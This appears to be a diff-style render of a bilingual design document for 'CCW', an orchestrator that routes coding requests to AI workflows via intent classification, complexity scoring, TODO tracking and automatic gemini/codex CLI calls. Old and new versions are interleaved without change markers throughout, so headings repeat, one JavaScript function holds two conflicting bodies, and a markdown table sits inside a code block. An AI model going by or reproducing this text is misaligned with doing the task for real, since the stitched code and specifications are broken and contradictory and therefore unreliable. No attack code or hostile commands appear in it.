└─────────────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ CCW Orchestrator (Stateless) │
|
||||
│ CCW Orchestrator (CLI-Enhanced + Requirement Analysis) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Input Analysis │
|
||||
│ ├─ Intent Classification (bugfix/feature/refactor/issue/...) │
|
||||
│ ├─ Complexity Assessment (low/medium/high) │
|
||||
│ ├─ Context Detection (codebase familiarity needed?) │
|
||||
│ └─ Constraint Extraction (time/scope/quality) │
|
||||
│ │
|
||||
│ Workflow Selection (Decision Tree) │
|
||||
│ ├─ 🐛 Bug? → lite-fix / lite-fix --hotfix │
|
||||
│ ├─ ❓ Unclear? → brainstorm → plan → execute │
|
||||
│ ├─ ⚡ Simple? → lite-plan → lite-execute │
|
||||
│ ├─ 🔧 Complex? → plan → execute │
|
||||
│ ├─ 📋 Issue? → issue:plan → issue:queue → issue:execute │
|
||||
│ └─ 🎨 UI? → ui-design → plan → execute │
|
||||
│ │
|
||||
│ Execution Dispatch │
|
||||
│ └─ SlashCommand("/workflow:xxx") or Task(agent) │
|
||||
│ │
|
||||
│ Phase 1 │ Input Analysis (rule-based, fast path) │
|
||||
│ Phase 1.5 │ CLI Classification (semantic, smart path) │
|
||||
│ Phase 1.75 │ Requirement Clarification (clarity < 2) │
|
||||
│ Phase 2 │ Level Selection (intent → level → workflow) │
|
||||
│ Phase 2.5 │ CLI Action Planning (high complexity) │
|
||||
│ Phase 3 │ User Confirmation (optional) │
|
||||
│ Phase 4 │ TODO Tracking Setup │
|
||||
│ Phase 5 │ Execution Loop │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Workflow Combinations (组合技)
|
||||
## Level Quick Reference
|
||||
|
||||
### 1. Rapid (快速迭代) ⚡
|
||||
**Pattern**: 多模型协作分析 + 直接执行
|
||||
**Commands**: `/workflow:lite-plan` → `/workflow:lite-execute`
|
||||
**When to use**:
|
||||
- 明确知道做什么和怎么做
|
||||
- 单一功能或小型改动
|
||||
- 快速原型验证
|
||||
| Level | Name | Workflows | Artifacts | Execution |
|
||||
|-------|------|-----------|-----------|-----------|
|
||||
| **1** | Rapid | `lite-lite-lite` | None | Direct execute |
|
||||
| **2** | Lightweight | `lite-plan`, `lite-fix`, `multi-cli-plan` | Memory/Lightweight files | → `lite-execute` |
|
||||
| **3** | Standard | `plan`, `tdd-plan`, `test-fix-gen` | Session persistence | → `execute` / `test-cycle-execute` |
|
||||
| **4** | Brainstorm | `brainstorm:auto-parallel` → `plan` | Multi-role analysis + Session | → `execute` |
|
||||
| **-** | Issue | `discover` → `plan` → `queue` → `execute` | Issue records | Worktree isolation (optional) |
|
||||
|
||||
### 2. Full (完整流程) 📋
|
||||
**Pattern**: 分析 + 头脑风暴 + 规划 + 执行
|
||||
**Commands**: `/workflow:brainstorm:auto-parallel` → `/workflow:plan` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 不确定产品方向或技术方案
|
||||
- 需要多角色视角分析
|
||||
- 复杂新功能开发
|
||||
## Workflow Selection Decision Tree
|
||||
|
||||
### 3. Coupled (复杂耦合) 🔗
|
||||
**Pattern**: 完整规划 + 验证 + 执行
|
||||
**Commands**: `/workflow:plan` → `/workflow:action-plan-verify` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 跨模块依赖
|
||||
- 架构级变更
|
||||
- 团队协作项目
|
||||
|
||||
### 4. Bugfix (缺陷修复) 🐛
|
||||
**Pattern**: 智能诊断 + 修复
|
||||
**Commands**: `/workflow:lite-fix` or `/workflow:lite-fix --hotfix`
|
||||
**When to use**:
|
||||
- 任何有明确症状的Bug
|
||||
- 生产事故紧急修复
|
||||
- 根因不清楚需要诊断
|
||||
|
||||
### 5. Issue (长时间多点修复) 📌
|
||||
**Pattern**: Issue规划 + 队列 + 批量执行
|
||||
**Commands**: `/issue:plan` → `/issue:queue` → `/issue:execute`
|
||||
**When to use**:
|
||||
- 多个相关问题需要批量处理
|
||||
- 长时间跨度的修复任务
|
||||
- 需要优先级排序和冲突解决
|
||||
|
||||
### 6. UI-First (设计驱动) 🎨
|
||||
**Pattern**: UI设计 + 规划 + 执行
|
||||
**Commands**: `/workflow:ui-design:*` → `/workflow:plan` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 前端功能开发
|
||||
- 需要视觉参考
|
||||
- 设计系统集成
|
||||
```
|
||||
Start
|
||||
│
|
||||
├─ Is it post-development maintenance?
|
||||
│ ├─ Yes → Issue Workflow
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Are requirements clear?
|
||||
│ ├─ Uncertain → Level 4 (brainstorm:auto-parallel)
|
||||
│ └─ Clear ↓
|
||||
│
|
||||
├─ Need persistent Session?
|
||||
│ ├─ Yes → Level 3 (plan / tdd-plan / test-fix-gen)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Need multi-perspective / solution comparison?
|
||||
│ ├─ Yes → Level 2 (multi-cli-plan)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Is it a bug fix?
|
||||
│ ├─ Yes → Level 2 (lite-fix)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Need planning?
|
||||
│ ├─ Yes → Level 2 (lite-plan)
|
||||
│ └─ No → Level 1 (lite-lite-lite)
|
||||
```
|
||||
|
||||
## Intent Classification
|
||||
|
||||
```javascript
|
||||
function classifyIntent(input) {
|
||||
const text = input.toLowerCase()
|
||||
|
||||
// Priority 1: Bug keywords
|
||||
if (/\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect)\b/.test(text)) {
|
||||
if (/\b(hotfix|urgent|production|critical|emergency)\b/.test(text)) {
|
||||
return { type: 'bugfix', mode: 'hotfix', workflow: 'lite-fix --hotfix' }
|
||||
}
|
||||
return { type: 'bugfix', mode: 'standard', workflow: 'lite-fix' }
|
||||
}
|
||||
|
||||
// Priority 2: Issue batch keywords
|
||||
if (/\b(issues?|batch|queue|多个|批量)\b/.test(text) && /\b(fix|resolve|处理)\b/.test(text)) {
|
||||
return { type: 'issue', workflow: 'issue:plan → issue:queue → issue:execute' }
|
||||
}
|
||||
|
||||
// Priority 3: Uncertainty keywords → Full workflow
|
||||
if (/\b(不确定|不知道|explore|研究|分析一下|怎么做|what if|should i|探索)\b/.test(text)) {
|
||||
return { type: 'exploration', workflow: 'brainstorm → plan → execute' }
|
||||
}
|
||||
|
||||
// Priority 4: UI/Design keywords
|
||||
if (/\b(ui|界面|design|设计|component|组件|style|样式|layout|布局)\b/.test(text)) {
|
||||
return { type: 'ui', workflow: 'ui-design → plan → execute' }
|
||||
}
|
||||
|
||||
// Priority 5: Complexity assessment for remaining
|
||||
const complexity = assessComplexity(text)
|
||||
|
||||
if (complexity === 'high') {
|
||||
return { type: 'feature', complexity: 'high', workflow: 'plan → verify → execute' }
|
||||
}
|
||||
|
||||
if (complexity === 'medium') {
|
||||
return { type: 'feature', complexity: 'medium', workflow: 'lite-plan → lite-execute' }
|
||||
}
|
||||
|
||||
return { type: 'feature', complexity: 'low', workflow: 'lite-plan → lite-execute' }
|
||||
}
|
||||
### Priority Order (with Level Mapping)
|
||||
|
||||
| Priority | Intent | Patterns | Level | Flow |
|
||||
|----------|--------|----------|-------|------|
|
||||
| 1 | bugfix/hotfix | `urgent,production,critical` + bug | L2 | `bugfix.hotfix` |
|
||||
| 1 | bugfix | `fix,bug,error,crash,fail` | L2 | `bugfix.standard` |
|
||||
| 2 | issue batch | `issues,batch` + `fix,resolve` | Issue | `issue` |
|
||||
| 3 | exploration | `不确定,explore,研究,what if` | L4 | `full` |
|
||||
| 3 | multi-perspective | `多视角,权衡,比较方案,cross-verify` | L2 | `multi-cli-plan` |
|
||||
| 4 | quick-task | `快速,简单,small,quick` + feature | L1 | `lite-lite-lite` |
|
||||
| 5 | ui design | `ui,design,component,style` | L3/L4 | `ui` |
|
||||
| 6 | tdd | `tdd,test-driven,先写测试` | L3 | `tdd` |
|
||||
| 7 | test-fix | `测试失败,test fail,fix test` | L3 | `test-fix-gen` |
|
||||
| 8 | review | `review,审查,code review` | L3 | `review-fix` |
|
||||
| 9 | documentation | `文档,docs,readme` | L2 | `docs` |
|
||||
| 99 | feature | complexity-based | L2/L3 | `rapid`/`coupled` |
|
||||
|
||||
### Quick Selection Guide
|
||||
|
||||
| Scenario | Recommended Workflow | Level |
|
||||
|----------|---------------------|-------|
|
||||
| Quick fixes, config adjustments | `lite-lite-lite` | 1 |
|
||||
| Clear single-module features | `lite-plan → lite-execute` | 2 |
|
||||
| Bug diagnosis and fix | `lite-fix` | 2 |
|
||||
| Production emergencies | `lite-fix --hotfix` | 2 |
|
||||
| Technology selection, solution comparison | `multi-cli-plan → lite-execute` | 2 |
|
||||
| Multi-module changes, refactoring | `plan → verify → execute` | 3 |
|
||||
| Test-driven development | `tdd-plan → execute → tdd-verify` | 3 |
|
||||
| Test failure fixes | `test-fix-gen → test-cycle-execute` | 3 |
|
||||
| New features, architecture design | `brainstorm:auto-parallel → plan → execute` | 4 |
|
||||
| Post-development issue fixes | Issue Workflow | - |
|
||||
|
||||
### Complexity Assessment
|
||||
|
||||
```javascript
|
||||
function assessComplexity(text) {
|
||||
let score = 0
|
||||
|
||||
// Architecture keywords
|
||||
if (/\b(refactor|重构|migrate|迁移|architect|架构|system|系统)\b/.test(text)) score += 2
|
||||
|
||||
// Multi-module keywords
|
||||
if (/\b(multiple|多个|across|跨|all|所有|entire|整个)\b/.test(text)) score += 2
|
||||
|
||||
// Integration keywords
|
||||
if (/\b(integrate|集成|connect|连接|api|database|数据库)\b/.test(text)) score += 1
|
||||
|
||||
// Security/Performance keywords
|
||||
if (/\b(security|安全|performance|性能|scale|扩展)\b/.test(text)) score += 1
|
||||
|
||||
if (score >= 4) return 'high'
|
||||
if (score >= 2) return 'medium'
|
||||
return 'low'
|
||||
if (/refactor|重构|migrate|迁移|architect|架构|system|系统/.test(text)) score += 2
|
||||
if (/multiple|多个|across|跨|all|所有|entire|整个/.test(text)) score += 2
|
||||
if (/integrate|集成|api|database|数据库/.test(text)) score += 1
|
||||
if (/security|安全|performance|性能|scale|扩展/.test(text)) score += 1
|
||||
return score >= 4 ? 'high' : score >= 2 ? 'medium' : 'low'
|
||||
}
|
||||
```
|
||||
|
||||
## Execution Flow
|
||||
| Complexity | Flow |
|
||||
|------------|------|
|
||||
| high | `coupled` (plan → verify → execute) |
|
||||
| medium/low | `rapid` (lite-plan → lite-execute) |
|
||||
|
||||
### Phase 1: Input Analysis
|
||||
### Dimension Extraction (WHAT/WHERE/WHY/HOW)
|
||||
|
||||
从用户输入提取四个维度,用于需求澄清和工作流选择:
|
||||
|
||||
| 维度 | 提取内容 | 示例模式 |
|
||||
|------|----------|----------|
|
||||
| **WHAT** | action + target | `创建/修复/重构/优化/分析` + 目标对象 |
|
||||
| **WHERE** | scope + paths | `file/module/system` + 文件路径 |
|
||||
| **WHY** | goal + motivation | `为了.../因为.../目的是...` |
|
||||
| **HOW** | constraints + preferences | `必须.../不要.../应该...` |
|
||||
|
||||
**Clarity Score** (0-3):
|
||||
- +0.5: 有明确 action
|
||||
- +0.5: 有具体 target
|
||||
- +0.5: 有文件路径
|
||||
- +0.5: scope 不是 unknown
|
||||
- +0.5: 有明确 goal
|
||||
- +0.5: 有约束条件
|
||||
- -0.5: 包含不确定词 (`不知道/maybe/怎么`)
|
||||
|
||||
### Requirement Clarification
|
||||
|
||||
当 `clarity_score < 2` 时触发需求澄清:
|
||||
|
||||
```javascript
|
||||
// Parse user input
|
||||
const input = userInput.trim()
|
||||
if (dimensions.clarity_score < 2) {
|
||||
const questions = generateClarificationQuestions(dimensions)
|
||||
// 生成问题:目标是什么? 范围是什么? 有什么约束?
|
||||
AskUserQuestion({ questions })
|
||||
}
|
||||
```
|
||||
|
||||
// Check for explicit workflow request
|
||||
**澄清问题类型**:
|
||||
- 目标不明确 → "你想要对什么进行操作?"
|
||||
- 范围不明确 → "操作的范围是什么?"
|
||||
- 目的不明确 → "这个操作的主要目标是什么?"
|
||||
- 复杂操作 → "有什么特殊要求或限制?"
|
||||
|
||||
## TODO Tracking Protocol
|
||||
|
||||
### CRITICAL: Append-Only Rule
|
||||
|
||||
CCW 创建的 Todo **必须附加到现有列表**,不能覆盖用户的其他 Todo。
|
||||
|
||||
### Implementation
|
||||
|
||||
```javascript
|
||||
// 1. 使用 CCW 前缀隔离工作流 todo
|
||||
const prefix = `CCW:${flowName}`
|
||||
|
||||
// 2. 创建新 todo 时使用前缀格式
|
||||
TodoWrite({
|
||||
todos: [
|
||||
...existingNonCCWTodos, // 保留用户的 todo
|
||||
{ content: `${prefix}: [1/N] /command:step1`, status: "in_progress", activeForm: "..." },
|
||||
{ content: `${prefix}: [2/N] /command:step2`, status: "pending", activeForm: "..." }
|
||||
]
|
||||
})
|
||||
|
||||
// 3. 更新状态时只修改匹配前缀的 todo
|
||||
```
|
||||
|
||||
### Todo Format
|
||||
|
||||
```
|
||||
CCW:{flow}: [{N}/{Total}] /command:name
|
||||
```
|
||||
|
||||
### Visual Example
|
||||
|
||||
```
|
||||
✓ CCW:rapid: [1/2] /workflow:lite-plan
|
||||
→ CCW:rapid: [2/2] /workflow:lite-execute
|
||||
用户自己的 todo(保留不动)
|
||||
```
|
||||
|
||||
### Status Management
|
||||
|
||||
- 开始工作流:创建所有步骤 todo,第一步 `in_progress`
|
||||
- 完成步骤:当前步骤 `completed`,下一步 `in_progress`
|
||||
- 工作流结束:所有 CCW todo 标记 `completed`
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```javascript
|
||||
// 1. Check explicit command
|
||||
if (input.startsWith('/workflow:') || input.startsWith('/issue:')) {
|
||||
// User explicitly requested a workflow, pass through
|
||||
SlashCommand(input)
|
||||
return
|
||||
}
|
||||
|
||||
// Classify intent
|
||||
const intent = classifyIntent(input)
|
||||
// 2. Classify intent
|
||||
const intent = classifyIntent(input) // See command.json intent_rules
|
||||
|
||||
console.log(`
|
||||
## Intent Analysis
|
||||
// 3. Select flow
|
||||
const flow = selectFlow(intent) // See command.json flows
|
||||
|
||||
**Input**: ${input.substring(0, 100)}...
|
||||
**Classification**: ${intent.type}
|
||||
**Complexity**: ${intent.complexity || 'N/A'}
|
||||
**Recommended Workflow**: ${intent.workflow}
|
||||
`)
|
||||
```
|
||||
// 4. Create todos with CCW prefix
|
||||
createWorkflowTodos(flow)
|
||||
|
||||
### Phase 2: User Confirmation (Optional)
|
||||
|
||||
```javascript
|
||||
// For high-complexity or ambiguous intents, confirm with user
|
||||
if (intent.complexity === 'high' || intent.type === 'exploration') {
|
||||
const confirmation = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Recommended: ${intent.workflow}. Proceed?`,
|
||||
header: "Workflow",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: `${intent.workflow} (Recommended)`, description: "Use recommended workflow" },
|
||||
{ label: "Rapid (lite-plan)", description: "Quick iteration" },
|
||||
{ label: "Full (brainstorm+plan)", description: "Complete exploration" },
|
||||
{ label: "Manual", description: "I'll specify the commands" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
// Adjust workflow based on user selection
|
||||
intent.workflow = mapSelectionToWorkflow(confirmation)
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Workflow Dispatch
|
||||
|
||||
```javascript
|
||||
switch (intent.workflow) {
|
||||
case 'lite-fix':
|
||||
SlashCommand('/workflow:lite-fix', args: input)
|
||||
break
|
||||
|
||||
case 'lite-fix --hotfix':
|
||||
SlashCommand('/workflow:lite-fix --hotfix', args: input)
|
||||
break
|
||||
|
||||
case 'lite-plan → lite-execute':
|
||||
SlashCommand('/workflow:lite-plan', args: input)
|
||||
// lite-plan will automatically dispatch to lite-execute
|
||||
break
|
||||
|
||||
case 'plan → verify → execute':
|
||||
SlashCommand('/workflow:plan', args: input)
|
||||
// After plan, prompt for verify and execute
|
||||
break
|
||||
|
||||
case 'brainstorm → plan → execute':
|
||||
SlashCommand('/workflow:brainstorm:auto-parallel', args: input)
|
||||
// After brainstorm, continue with plan
|
||||
break
|
||||
|
||||
case 'issue:plan → issue:queue → issue:execute':
|
||||
SlashCommand('/issue:plan', args: input)
|
||||
// Issue workflow handles queue and execute
|
||||
break
|
||||
|
||||
case 'ui-design → plan → execute':
|
||||
// Determine UI design subcommand
|
||||
if (hasReference(input)) {
|
||||
SlashCommand('/workflow:ui-design:imitate-auto', args: input)
|
||||
} else {
|
||||
SlashCommand('/workflow:ui-design:explore-auto', args: input)
|
||||
}
|
||||
break
|
||||
}
|
||||
// 5. Dispatch first command
|
||||
SlashCommand(flow.steps[0].command, args: input)
|
||||
```
|
||||
|
||||
## CLI Tool Integration
|
||||
|
||||
CCW **隐式调用** CLI 工具以获得三大优势:
|
||||
CCW 在特定条件下自动注入 CLI 调用:
|
||||
|
||||
### 1. Token 效率 (Context Efficiency)
|
||||
| Condition | CLI Inject |
|
||||
|-----------|------------|
|
||||
| 大量代码上下文 (≥50k chars) | `gemini --mode analysis` |
|
||||
| 高复杂度任务 | `gemini --mode analysis` |
|
||||
| Bug 诊断 | `gemini --mode analysis` |
|
||||
| 多任务执行 (≥3 tasks) | `codex --mode write` |
|
||||
|
||||
CLI 工具在单独进程中运行,可以处理大量代码上下文而不消耗主会话 token:
|
||||
### CLI Enhancement Phases
|
||||
|
||||
| 场景 | 触发条件 | 自动注入 |
|
||||
|------|----------|----------|
|
||||
| 大量代码上下文 | 文件读取 ≥ 50k 字符 | `gemini --mode analysis` |
|
||||
| 多模块分析 | 涉及 ≥ 5 个模块 | `gemini --mode analysis` |
|
||||
| 代码审查 | review 步骤 | `gemini --mode analysis` |
|
||||
**Phase 1.5: CLI-Assisted Classification**
|
||||
|
||||
### 2. 多模型视角 (Multi-Model Perspectives)
|
||||
当规则匹配不明确时,使用 CLI 辅助分类:
|
||||
|
||||
不同模型有不同优势,CCW 根据任务类型自动选择:
|
||||
| 触发条件 | 说明 |
|
||||
|----------|------|
|
||||
| matchCount < 2 | 多个意图模式匹配 |
|
||||
| complexity = high | 高复杂度任务 |
|
||||
| input > 100 chars | 长输入需要语义理解 |
|
||||
|
||||
| Tool | 核心优势 | 最佳场景 | 触发关键词 |
|
||||
|------|----------|----------|------------|
|
||||
| Gemini | 超长上下文、深度分析、架构理解、执行流追踪 | 代码库理解、架构评估、根因分析 | "分析", "理解", "设计", "架构", "诊断" |
|
||||
| Qwen | 代码模式识别、多维度分析 | Gemini备选、第二视角验证 | "评估", "对比", "验证" |
|
||||
| Codex | 精确代码生成、自主执行、数学推理 | 功能实现、重构、测试 | "实现", "重构", "修复", "生成", "测试" |
|
||||
**Phase 2.5: CLI-Assisted Action Planning**
|
||||
|
||||
### 3. 增强能力 (Enhanced Capabilities)
|
||||
高复杂度任务的工作流优化:
|
||||
|
||||
#### Debug 能力增强
|
||||
```
|
||||
触发条件: intent === 'bugfix' AND root_cause_unclear
|
||||
自动注入: gemini --mode analysis (执行流追踪)
|
||||
用途: 假设驱动调试、状态机错误诊断、并发问题排查
|
||||
```
|
||||
| 触发条件 | 说明 |
|
||||
|----------|------|
|
||||
| complexity = high | 高复杂度任务 |
|
||||
| steps >= 3 | 多步骤工作流 |
|
||||
| input > 200 chars | 复杂需求描述 |
|
||||
|
||||
#### 规划能力增强
|
||||
```
|
||||
触发条件: complexity === 'high' OR intent === 'exploration'
|
||||
自动注入: gemini --mode analysis (架构分析)
|
||||
用途: 复杂任务先用CLI分析获取多模型视角
|
||||
```
|
||||
CLI 可返回建议:`use_default` | `modify` (调整步骤) | `upgrade` (升级工作流)
|
||||
|
||||
### 隐式注入规则 (Implicit Injection Rules)
|
||||
## Continuation Commands
|
||||
|
||||
CCW 在以下条件自动注入 CLI 调用(无需用户显式请求):
|
||||
工作流执行中的用户控制命令:
|
||||
|
||||
```javascript
|
||||
const implicitRules = {
|
||||
// 上下文收集:大量代码使用CLI可节省主会话token
|
||||
context_gathering: {
|
||||
trigger: 'file_read >= 50k chars OR module_count >= 5',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 规划前分析:复杂任务先用CLI分析
|
||||
pre_planning_analysis: {
|
||||
trigger: 'complexity === "high" OR intent === "exploration"',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 调试诊断:利用Gemini的执行流追踪能力
|
||||
debug_diagnosis: {
|
||||
trigger: 'intent === "bugfix" AND root_cause_unclear',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 代码审查:用CLI减少token占用
|
||||
code_review: {
|
||||
trigger: 'step === "review"',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 多任务执行:用Codex自主完成
|
||||
implementation: {
|
||||
trigger: 'step === "execute" AND task_count >= 3',
|
||||
inject: 'codex --mode write'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 用户语义触发 (Semantic Tool Assignment)
|
||||
|
||||
```javascript
|
||||
// 用户可以通过自然语言指定工具偏好
|
||||
const toolHints = {
|
||||
gemini: /用\s*gemini|gemini\s*分析|让\s*gemini|深度分析|架构理解/i,
|
||||
qwen: /用\s*qwen|qwen\s*评估|让\s*qwen|第二视角/i,
|
||||
codex: /用\s*codex|codex\s*实现|让\s*codex|自主完成|批量修改/i
|
||||
}
|
||||
|
||||
function detectToolPreference(input) {
|
||||
for (const [tool, pattern] of Object.entries(toolHints)) {
|
||||
if (pattern.test(input)) return tool
|
||||
}
|
||||
return null // Auto-select based on task type
|
||||
}
|
||||
```
|
||||
|
||||
### 独立 CLI 工作流 (Standalone CLI Workflows)
|
||||
|
||||
直接调用 CLI 进行特定任务:
|
||||
|
||||
| Workflow | 命令 | 用途 |
|
||||
|----------|------|------|
|
||||
| CLI Analysis | `ccw cli --tool gemini` | 大型代码库快速理解、架构评估 |
|
||||
| CLI Implement | `ccw cli --tool codex` | 明确需求的自主实现 |
|
||||
| CLI Debug | `ccw cli --tool gemini` | 复杂bug根因分析、执行流追踪 |
|
||||
|
||||
## Index Files (Dynamic Coordination)
|
||||
|
||||
CCW 使用索引文件实现智能命令协调:
|
||||
|
||||
| Index | Purpose |
|
||||
|-------|---------|
|
||||
| [index/command-capabilities.json](index/command-capabilities.json) | 命令能力分类(explore, plan, execute, test, review...) |
|
||||
| [index/workflow-chains.json](index/workflow-chains.json) | 预定义工作流链(rapid, full, coupled, bugfix, issue, tdd, ui...) |
|
||||
|
||||
### 能力分类
|
||||
|
||||
```
|
||||
capabilities:
|
||||
├── explore - 代码探索、上下文收集
|
||||
├── brainstorm - 多角色分析、方案探索
|
||||
├── plan - 任务规划、分解
|
||||
├── verify - 计划验证、质量检查
|
||||
├── execute - 任务执行、代码实现
|
||||
├── bugfix - Bug诊断、修复
|
||||
├── test - 测试生成、执行
|
||||
├── review - 代码审查、质量分析
|
||||
├── issue - 批量问题管理
|
||||
├── ui-design - UI设计、原型
|
||||
├── memory - 文档、知识管理
|
||||
├── session - 会话管理
|
||||
└── debug - 调试、问题排查
|
||||
```
|
||||
|
||||
## TODO Tracking Integration
|
||||
|
||||
CCW 自动使用 TodoWrite 跟踪工作流执行进度:
|
||||
|
||||
```javascript
|
||||
// 工作流启动时自动创建 TODO 列表
|
||||
TodoWrite({
|
||||
todos: [
|
||||
{ content: "CCW: Rapid Iteration (2 steps)", status: "in_progress", activeForm: "Running workflow" },
|
||||
{ content: "[1/2] /workflow:lite-plan", status: "in_progress", activeForm: "Executing lite-plan" },
|
||||
{ content: "[2/2] /workflow:lite-execute", status: "pending", activeForm: "Executing lite-execute" }
|
||||
]
|
||||
})
|
||||
|
||||
// 每个步骤完成后自动更新状态
|
||||
// 支持暂停、继续、跳过操作
|
||||
```
|
||||
|
||||
**进度可视化**:
|
||||
```
|
||||
✓ CCW: Rapid Iteration (2 steps)
|
||||
✓ [1/2] /workflow:lite-plan
|
||||
→ [2/2] /workflow:lite-execute
|
||||
```
|
||||
|
||||
**控制命令**:
|
||||
| Input | Action |
|
||||
|-------|--------|
|
||||
| `continue` | 执行下一步 |
|
||||
| 命令 | 作用 |
|
||||
|------|------|
|
||||
| `continue` | 继续执行下一步 |
|
||||
| `skip` | 跳过当前步骤 |
|
||||
| `abort` | 停止工作流 |
|
||||
| `/workflow:*` | 执行指定命令 |
|
||||
| `abort` | 终止工作流 |
|
||||
| `/workflow:*` | 切换到指定命令 |
|
||||
| 自然语言 | 重新分析意图 |
|
||||
|
||||
## Reference Documents
|
||||
## Workflow Flow Details
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 编排器决策逻辑 + TODO 跟踪 |
|
||||
| [phases/actions/rapid.md](phases/actions/rapid.md) | 快速迭代组合 |
|
||||
| [phases/actions/full.md](phases/actions/full.md) | 完整流程组合 |
|
||||
| [phases/actions/coupled.md](phases/actions/coupled.md) | 复杂耦合组合 |
|
||||
| [phases/actions/bugfix.md](phases/actions/bugfix.md) | 缺陷修复组合 |
|
||||
| [phases/actions/issue.md](phases/actions/issue.md) | Issue工作流组合 |
|
||||
| [specs/intent-classification.md](specs/intent-classification.md) | 意图分类规范 |
|
||||
| [WORKFLOW_DECISION_GUIDE.md](/WORKFLOW_DECISION_GUIDE.md) | 工作流决策指南 |
|
||||
### Issue Workflow (Main Workflow 补充机制)
|
||||
|
||||
## Examples
|
||||
Issue Workflow 是 Main Workflow 的**补充机制**,专注于开发后的持续维护。
|
||||
|
||||
#### 设计理念
|
||||
|
||||
| 方面 | Main Workflow | Issue Workflow |
|
||||
|------|---------------|----------------|
|
||||
| **用途** | 主要开发周期 | 开发后维护 |
|
||||
| **时机** | 功能开发阶段 | 主工作流完成后 |
|
||||
| **范围** | 完整功能实现 | 针对性修复/增强 |
|
||||
| **并行性** | 依赖分析 → Agent 并行 | Worktree 隔离 (可选) |
|
||||
| **分支模型** | 当前分支工作 | 可使用隔离的 worktree |
|
||||
|
||||
#### 为什么 Main Workflow 不自动使用 Worktree?
|
||||
|
||||
**依赖分析已解决并行性问题**:
|
||||
1. 规划阶段 (`/workflow:plan`) 执行依赖分析
|
||||
2. 自动识别任务依赖和关键路径
|
||||
3. 划分为**并行组**(独立任务)和**串行链**(依赖任务)
|
||||
4. Agent 并行执行独立任务,无需文件系统隔离
|
||||
|
||||
#### 两阶段生命周期
|
||||
|
||||
### Example 1: Bug Fix
|
||||
```
|
||||
User: 用户登录失败,返回 401 错误
|
||||
CCW: Intent=bugfix, Workflow=lite-fix
|
||||
→ /workflow:lite-fix "用户登录失败,返回 401 错误"
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 1: Accumulation (积累阶段) │
|
||||
│ │
|
||||
│ Triggers: 任务完成后的 review、代码审查发现、测试失败 │
|
||||
│ │
|
||||
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
|
||||
│ │ discover │ │ discover- │ │ new │ │
|
||||
│ │ Auto-find │ │ by-prompt │ │ Manual │ │
|
||||
│ └────────────┘ └────────────┘ └────────────┘ │
|
||||
│ │
|
||||
│ 持续积累 issues 到待处理队列 │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
│
|
||||
│ 积累足够后
|
||||
▼
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 2: Batch Resolution (批量解决阶段) │
|
||||
│ │
|
||||
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
|
||||
│ │ plan │ ──→ │ queue │ ──→ │ execute │ │
|
||||
│ │ --all- │ │ Optimize │ │ Parallel │ │
|
||||
│ │ pending │ │ order │ │ execution │ │
|
||||
│ └────────────┘ └────────────┘ └────────────┘ │
|
||||
│ │
|
||||
│ 支持 worktree 隔离,保持主分支稳定 │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### Example 2: New Feature (Simple)
|
||||
#### 与 Main Workflow 的协作
|
||||
|
||||
```
|
||||
User: 添加用户头像上传功能
|
||||
CCW: Intent=feature, Complexity=low, Workflow=lite-plan→lite-execute
|
||||
→ /workflow:lite-plan "添加用户头像上传功能"
|
||||
开发迭代循环
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ │
|
||||
│ ┌─────────┐ ┌─────────┐ │
|
||||
│ │ Feature │ ──→ Main Workflow ──→ Done ──→│ Review │ │
|
||||
│ │ Request │ (Level 1-4) └────┬────┘ │
|
||||
│ └─────────┘ │ │
|
||||
│ ▲ │ 发现 Issues │
|
||||
│ │ ▼ │
|
||||
│ │ ┌─────────┐ │
|
||||
│ 继续 │ │ Issue │ │
|
||||
│ 新功能│ │ Workflow│ │
|
||||
│ │ └────┬────┘ │
|
||||
│ │ ┌──────────────────────────────┘ │
|
||||
│ │ │ 修复完成 │
|
||||
│ │ ▼ │
|
||||
│ ┌────┴────┐◀────── │
|
||||
│ │ Main │ Merge │
|
||||
│ │ Branch │ back │
|
||||
│ └─────────┘ │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### Example 3: Complex Refactoring
|
||||
```
|
||||
User: 重构整个认证模块,迁移到 OAuth2
|
||||
CCW: Intent=feature, Complexity=high, Workflow=plan→verify→execute
|
||||
→ /workflow:plan "重构整个认证模块,迁移到 OAuth2"
|
||||
#### 命令列表
|
||||
|
||||
**积累阶段:**
|
||||
```bash
|
||||
/issue:discover # 多视角自动发现
|
||||
/issue:discover-by-prompt # 基于提示发现
|
||||
/issue:new # 手动创建
|
||||
```
|
||||
|
||||
### Example 4: Exploration
|
||||
```
|
||||
